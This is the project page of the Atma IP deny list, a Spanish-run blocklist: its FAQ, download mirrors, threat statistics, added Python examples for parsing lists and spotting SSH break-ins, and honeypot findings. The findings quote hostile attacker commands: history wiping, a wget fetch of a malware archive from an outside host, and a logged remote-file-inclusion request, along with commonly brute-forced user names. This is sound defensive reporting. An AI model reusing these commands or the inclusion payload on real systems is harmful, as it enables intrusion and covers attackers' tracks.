
Mission
We identify, gather and classify dangerous IP addresses such as:
- Attackers who try to spy on or remotely control others' computers by means such as Microsoft remote terminal, SSH, Telnet or shared desktops.
- Threats to email servers or users: spiders/bots, account hijacking, etc.
- Sites spreading viruses, trojans, spyware, etc., or simply used by them to let their authors know that a new computer has been infected.
- Threats to servers: exploits, fake identities/agents, DDoS attackers, etc.
- Port scans, which are the first step towards more dangerous actions.
- Malicious P2P sharers or bad peers who spread malware, inject bad traffic or share fake archives.
An updated list is published every 3-4 days, ready to be used with any blocking program. All you need to do is add it to your favourite program using one of the URLs below:
- http://www.atma.es/atma.p2p (probably not available from banned IPs or their closest neighbours)
- http://galinux.myftp.org/atma.p2p (probably not available from banned IPs or their closest neighbours)
- http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm (Gz compressed)
- http://list.iblocklist.com/lists/atma/atma (Gz compressed)
Documentation
How-to
- Peerguardian 2 for Windows
- IPlist/IPblock 0.26 for Linux
- Peerblock: just add a new list and paste http://list.iblocklist.com/lists/atma/atma
FAQ
How can I use the blacklist/atma deny list?
Most blocking programs come with a few pre-configured lists. Unfortunately, blacklist/atma is not among them as far as we know. Thus, you need to configure your blocking program (see above, "how-tos"). While this is an easy task in every case, there are no universal instructions valid for all of them. Our list is published in Peerguardian 1 format, which is compatible with nearly all existing programs and human readable "as is". If you are not using a blocking program yet, please go to the downloads section.
Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (comments in the first lines of the list) or give credit in any other fair way instead. If in doubt, please contact us.
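As an added illustration of how a list in this format is consumed (example code, not the project's own tooling): a small Python reader for the Peerguardian 1 text layout, which the example assumes to be one `description:first-last` IPv4 range per line with `#` comment lines, fed a constructed sample instead of the real Atma list.

```python
import ipaddress
from collections import Counter

# Constructed sample in Peerguardian 1 (.p2p) layout: "description:start-end".
# Lines starting with "#" are comments (the list's header notice lives there).
# Addresses are documentation ranges, not entries from the real list.
SAMPLE_P2P = """\
# blacklist/atma sample (constructed for this example)
SSH Attack:192.0.2.10-192.0.2.10
Port Scan Attack:198.51.100.0-198.51.100.255
Spammer:203.0.113.64-203.0.113.95
"""


def parse_p2p(text):
    """Return a list of (start_int, end_int, description), sorted by start.

    Raises ValueError on a malformed range so a corrupt download is noticed
    instead of silently shrinking the deny list."""
    ranges = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Split on the LAST colon: descriptions may themselves contain colons.
        desc, _, span = line.rpartition(":")
        try:
            lo, hi = (int(ipaddress.IPv4Address(p.strip())) for p in span.split("-", 1))
        except ValueError as exc:
            raise ValueError(f"line {lineno}: bad range {span!r}") from exc
        if lo > hi:
            raise ValueError(f"line {lineno}: start after end in {span!r}")
        ranges.append((lo, hi, desc.strip()))
    ranges.sort()
    return ranges


def lookup(ranges, ip):
    """Return the description of the first range containing ip, else None."""
    n = int(ipaddress.IPv4Address(ip))
    # Ranges may overlap, so a plain scan is the simplest correct check.
    for lo, hi, desc in ranges:
        if lo <= n <= hi:
            return desc
    return None


def count_by_threat(ranges):
    """Number of ranges per description, like the per-threat table below."""
    return Counter(desc for _, _, desc in ranges)
```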
Why should I use this list when my program of choice already comes with some others preconfigured?
Mainly for one reason alone: we do believe that we identify a good deal of IPs not listed anywhere else before. This is how we try to do it:
- We identify most dangerous IPs with our own tools, which are not based on any other. They are supposed to be harder to avoid because attackers don't know how they work, even if they know about their existence at all. Moreover, they can't know where we are lurking because we use dynamic IPs. In other words, when a threat is detected, the attacker will find its IP published within some 50 hours, but we will have changed ours before, so there will be no use for them in reviewing hundreds of logs or warning other attackers.
- We are Spanish speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers either are native English speakers or have very good skills in that language, but it is not very likely that they could understand Spanish. That's why they might be detected by us without even knowing how and where it happened.
- As of now, we are a small group. If we intend to harvest a large number of attacks we just cannot sit and wait for them to appear. Thus, we don't use passive detection but try to attract as many attacks as possible instead (obviously, we can't explain in detail how we do it).
Should I use this list alone or along with some others?
For one thing, the more lists you use, the harder it is for your computer to handle them, which could be a problem if your hardware is old. On the other hand, even though we add IPs from other sources, it is always safer to block them from several lists, perhaps updated more often than Atma, larger or more specialized. Since Atma is a multipurpose list, we do believe that it is suitable for most home and even professional users, especially those using P2P and/or running any kind of server. For your information, its contents as of March 2010 were as shown:
| Threat | IPs/ranges |
| Spammer | 20667 |
| Malware | 14846 |
| Unspecified Threat | 10979 |
| SSH Attack | 5348 |
| SMTP Port 25 Attack | 4183 |
| P2P Malware | 2704 |
| P2P Corrupted Packets | 2388 |
| Several Threats | 1577 |
| Threat For SQL Servers | 688 |
| Port Scan Attack | 554 |
| Proxy Seeker | 476 |
| Threat For Web Servers | 471 |
| Telnet Attack | 234 |
| MS-Terminal Attack | 191 |
| FTP Attack | 173 |
| P2P Unrequested Responses | 112 |
| VNC Attack | 68 |
| Others | 38 |
| Single IPs blocked | 88125 |
Bear in mind that we don't list IPs:
- Related to sex, ads, P2P trackers, etc. unless they explicitly pose a threat or risk.
- Some of the reserved IPs/ranges for local nets, testing, etc. listed in http://tools.ietf.org/html/rfc3330
- Belonging to the most used services, tools or companies: Google, Microsoft, Rapidshare, Yahoo and some others.
(Please note that even a common search in, say, Google could lead you to evil sites.)
If you want to block any of them, you definitely need extra lists.
How does an IP/range get delisted?
All IPs get deleted within 2-5 months, depending on a number of factors like the kind of threat and the historical behaviour. Of course, we remove false positives as soon as we get to know about them. As of June of 2010, entries had been in the list since:
| IPs/ranges added within | IPs/ranges |
| Current month (June) | 40261 |
| 1-2 months ago (May) | 21420 |
| 2-3 months ago (April) | 21101 |
| 3-4 months ago (March) | 213 |
Will I get rid of antivirus, anti-spyware and firewalls?
Not at all. Using a blocking program along with our list or any other just prevents your computer from contacting some others. That's all. For instance, you can still get your computer infected by sharing a memory card or by opening an infected email, even if delivered by a trustworthy ISP.
Despite already using the Atma list, I am still receiving spam.
Spammers' IPs are indeed targeted by us and included in the list, for one reason: those who send spam are very likely to pose other threats, notably to administrators of servers, forums, blogs, etc. We will never list IPs belonging to the most important providers, like Gmail, Hotmail, Yahoo, etc. Unfortunately, most spam comes from accounts of those companies. If you are not satisfied with their own filters and you are using a mail client, you could try installing a filter on your computer.
Is atma/blacklist a widely used list?
We guess not at all until February of 2010, but we had no other reliable data than those of galinux.myftp.org. As an indicative fact, the list had been downloaded more than 5000 times from there in January of 2010. However, it is currently available at iblocklist.com, which is perhaps the most important mirror for blocking lists.
What do the descriptions mean?
When using a blocking program you will see different kinds of alerts. Those provided by our list fall into three main categories:
- Attacks whose targets are HTTP/SQL/FTP/PHP servers
- Peers that spoil P2P or use it for spreading malware
- Other generic threats to most users and systems
Note this: each attack goes towards a specific target, but that doesn't mean that the attacker would refuse to take advantage of unexpected vulnerabilities. The same applies to operating systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are telling you that we have detected an SSH attack from that IP, but it is very likely they could run other kinds of attacks.
Some items represent quite benign actions, such as port scans or pinging. On the contrary, those labeled as "Several threats" are the most dangerous.
Assorted facts
Some SSH attacks:
| Stage | Commands seen |
| Gathering information | w, uptime, id, ls -a, uname -a, cat /proc/cpuifno, ps x, wget, curl -O |
| After a previous successful login | rm -rf .bash_history, history -c, w, ps x, ls -a |
| Attempting to get rid of the honeypot | bash, sh, kill -9 -1, reboot, exit |
| Sending malware to the target | uname -a, passwd, wget http://nasa.undernet.nm.ru/udp.tgz, tar zxvf udp.tgz |
Other deliveries came from
Some flashy detections:
- Telnet scans from 128.59.14.100-128.59.14.116 (Columbia University), which happened to be a false positive. Read about their project.
- Fake results in the Gnutella network from 65.50.67.197 (www.markmonitor.com) in March 2010... when looking for public domain files!
- Port scan from 69.48.241.84 (www.trustedsource.org, owned by McAfee Antivirus) on December 21st 2009.
- Sharing fake files in the Gnutella network from 65.55.102.24 (Microsoft Corporation), October 21st and November 1st 2009.
- Port scan from 208.43.71.139 (Avast Antivirus) in September and October 2009.
Statistics of blocking programs downloading blacklist/atma during the first week of December 2009:
| Program/Version | Downloads |
| PeerBlock/1.0.0.181 | 760 |
| PeerGuardian/2.0 | 253 |
| PeerBlock/1.0.0.202 | 112 |
| PeerBlock/1.0.0.223 | 43 |
| BlockControl/1.6.9 | 14 |
| PeerBlock/0.9.2.86 | 7 |
| IPblock/0.18 | 4 |
| IPblock/0.27 | 4 |
| IPblock/0.26 | 2 |
| PeerBlock/1.0.0.187 | 1 |

| Program | Total |
| PeerBlock | 916 |
| PeerGuardian | 253 |
| BlockControl | 14 |
| IPblock | 11 |
During September of 2009 attackers tried to log in under 10374 different user names. The most attacked were (attempts in brackets):
- root (9850), admin (1034), test (690), oracle (431), user (264), guest (224), robert (208), mysql (206), michael (195), paul (190)
- info (190), postgres (177), amanda (176), adam (176), sales (168), martin (166), backup (162), student (154), ftpuser (152), suporte (148)
- testing (132), nagios (130), eric (130), david (130), web (126), tester (126), john (124), richard (120), sarah (115), sam (114)
- patrick (114), bruce (110), matt (107), mark (106), cyrus (104), teste (102), marc (101), webmaster (100), download (100), [name not legible on the page] (100)
Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David" (a common name in both languages).
Bad boys never sleep:
2009, nightfall on the 24th of December. While many countries were celebrating Christmas Eve, attackers were taking advantage of it. The most striking one we detected during those hours was an SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20,859 username + password combinations.
2010, July the 7th. While millions were enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reported a (not actually) successful SSH dictionary attack:
Jul 7 19:27:42 [void] sshd[28641]: Accepted password for [void] from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 [void] sshd[12823]: Accepted password for [void] from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 [void] sshd[8048]: Accepted password for [void] from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 [void] sshd[28775]: Accepted password for [void] from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 [void] sshd[31450]: Accepted password for [void] from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 [void] sshd[8496]: Accepted password for [void] from 188.24.255.242 port 30856 ssh2
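The pattern in those lines, one account accepting password logins from several unrelated addresses within a few hours, is easy to pick out automatically. Added example (not the project's own tooling): a Python detector over constructed sshd lines in the same syslog layout, using documentation addresses and the invented user names `alice` and `bob`; the threshold and window are assumptions to tune per host.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the sshd syslog layout shown above. Addresses are
# documentation ranges and the user names are invented for this example.
SAMPLE_LOG = """\
Jul  7 19:27:42 host sshd[28641]: Accepted password for alice from 192.0.2.10 port 47065 ssh2
Jul  7 20:25:37 host sshd[12823]: Accepted password for alice from 198.51.100.7 port 46649 ssh2
Jul  7 21:17:08 host sshd[8048]: Accepted password for alice from 203.0.113.99 port 1266 ssh2
Jul  7 23:45:48 host sshd[28775]: Accepted password for alice from 203.0.113.5 port 33195 ssh2
Jul  7 23:47:14 host sshd[31450]: Accepted password for alice from 203.0.113.5 port 51866 ssh2
Jul  7 23:53:28 host sshd[8496]: Accepted publickey for bob from 192.0.2.20 port 30856 ssh2
Jul  7 23:58:01 host sshd[9001]: Failed password for invalid user oracle from 192.0.2.77 port 4000 ssh2
"""

ACCEPTED = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_accepted(text, year=2010):
    """Yield (timestamp, user, method, ip) for each successful sshd login.
    Syslog lines carry no year, so the caller supplies it."""
    for line in text.splitlines():
        m = ACCEPTED.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["method"], m["ip"]


def suspicious_accounts(text, max_ips=2, window_hours=6):
    """Return {user: sorted distinct ips} for accounts whose password logins
    came from more than max_ips distinct addresses inside window_hours."""
    events = defaultdict(list)
    for ts, user, method, ip in parse_accepted(text):
        if method == "password":  # key-based logins are not dictionary hits
            events[user].append((ts, ip))
    flagged = {}
    for user, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            # distinct source addresses in the window that starts at this login
            ips = {ip for t, ip in evs[i:] if (t - t0).total_seconds() <= window_hours * 3600}
            if len(ips) > max_ips:
                flagged[user] = sorted(ips)
                break
    return flagged
```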
Weird ways of fighting cybercrime:
Visit from www.delitosinformaticos.gov.co (Colombian government agency "Grupo Investigativo Delitos Informáticos"):
200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"
No comment :D
Get involved
1-Use and spread our list
Help us and help others by letting them know about us. You could link to us from your blog or website, tell your contacts about atma.es... On the other hand, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored on some more sites. If you are willing to set one up, please contact us.
2-Send your logs to us
We have developed some automatic tools that collect, select, classify and merge IPs from a variety of logs. If you think that some on your system could help us, please drop us a line. As of now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.
3-Report assorted IPs/ranges
If you know how to identify them in a particular context you could report them to us.
4-Run a "honey pot"
You can think of a "honey pot" as a disguise that makes your local net or computer look like something completely different from an attacker's point of view. Installing a basic one can be quite effective while easy to set up. If you need a little help, here we are!
5-Warn us about false positives, changed IPs, etc.
Sometimes we may be wrong and add some innocent IP to the list. But that is not the only issue we have to face; for instance, we need to remove old entries once they have turned safe, to exchange lots of info, to deal with lots of emails... We will always welcome your help.
6-Special request for English speakers
This page in English is still a draft. We would like you to help us by warning us about typos, wrong expressions and so on.
Links
Blocking programs for Microsoft Windows
- PeerBlock
- PeerGuardian
- ProtoWall (not open source)
- OutPost Pro (not free)
- BeeThink IP blocker (not free)
Blocking programs for Linux
Blocking programs for Mac-OS
If you know about any other not listed here, please tell us.
Third party sources
In our list we add the newest threats detected by other trustworthy sources, to whom we are indebted:
Amos.TwilightParadox.com Antispam.Andreotti.nl* Autoshun.org* Blackip.ustc.edu.cn Blocklist.de Boston.comites-it.org Cats-cradle.org Cert.ntnu.edu.tw Check.Torproject.org ChessPlays.ru Chriskujawski.com Clean-mx.de* Cyber-ta.org Cs.Rutgers.edu Danger.rulez.sk DnsBL.Abuse.ch* Dynastop.tanaya.net/ Dr-data.net Elfagr.net Elite-proxies.blogspot.com EmergingThreats.net EvilDayStar.net EvolutionArts.net Files.sabmx.net Faciti.com ForumPostersUnion.com Franfremont.com Fugitif.DynDns.org Gamble-Irwin-Group.com Genendesign.com Gw.Paraibuna.com.br Hackedreport.com/ Iantighe.com IPillion.com Jainvestigation.com Kikurin.org* Kish-telecom.com Lists.evolt.org Malc0de.com MaliciousNetworks.org* MalwareDomainList.com* MalwarePatrol.net MalwareURL.com Meganfath.com Merlot.com MosHunter.ru Mtc.sri.com MyIPtest.com MyWot.com/wiki NeilGunton.com Nethavoc.net Old-noritake.org Outten.co.uk Paradoxi.exisoft.nl Pellegrinilab.org PrairieHomeOutfitters.com Progressiverehabmuskego.com ProjectHoneyPot.org* ProSouthRealty.com Proxyfire.net Puaga.com Rblhu.net* Red-uno.es Revistamariela.com Saleaccess.ru Salemanuf.ru Sans.org* Sber2005.ru Sblam.com Senderbase.org Semeliker.net Shinshu.fm Slyparadox.com Smp.rnc.ro Snortattack.org Spam-ip.com sshBL.org* Stats.denyhosts.net StopForumSpam.com Sudosecure.net Tcc.edu.tw TheHackedReport.com Threatexpert.com Trustedsource.org Twitter.com/compromised_sys Twitter.com/HoneyPoint* Twitter.com/olaf_j* Uceprotect.net Univedant.com Unusualdischarge.com Ustc.edu.cn Virbl.bit.nl VillagePlayers.org Websworld.org Xml.SsdSandBox.net 60bPictures.com 192.192.205.93 66.197.202.5
Note: when you perform an IP/range query, results may include not a generic label but some of the sources labelled with * instead.
Please note that we select IPs following our own criteria rather than automatically adding every single one from every single source. That's why you could find IPs that are listed in some of them but missing from the Atma deny list.
Contact
Visit our Google group (Spanish only) or send us an email.

